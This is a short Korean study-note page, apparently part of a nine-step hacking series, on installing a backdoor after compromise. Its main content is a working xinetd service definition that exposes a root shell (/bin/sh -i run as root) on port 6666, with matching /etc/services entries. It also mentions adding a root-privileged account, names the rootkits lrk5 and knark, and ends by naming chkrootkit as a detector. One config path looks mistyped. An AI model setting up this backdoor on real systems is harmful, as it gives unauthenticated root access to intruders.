내용과표현분리 › 좋은글이있는.곳.com › JWSDP이용한웹서비스작성순서 › 함께자라기,애자일로가는길-김창준-2019 › classloader.jsp › 7.백도어설치-해킹공격9단계
주로사용하는 위치 /tmp or /var/tmp
xinetd 데몬을 이용하여 셸을 실행시키는 서비스 생성하여 특정 포트로 연결
# cat /etc/cat/xinetd.d/hacker service hacker { disable = no flags = REUSE socket_type = stream wait = no user = root server = /bin/sh server_args = -i } # cat /etc/services hacker 6666/tcp hacker 6666/udp
루트권한가진 계정 추가
rootkit (공격도구 패키지) #
lrk5
kernel backdoor #
knark - 리눅스커널 2.2에 설치
루트킷 감지 프로그램 #
chkrootkit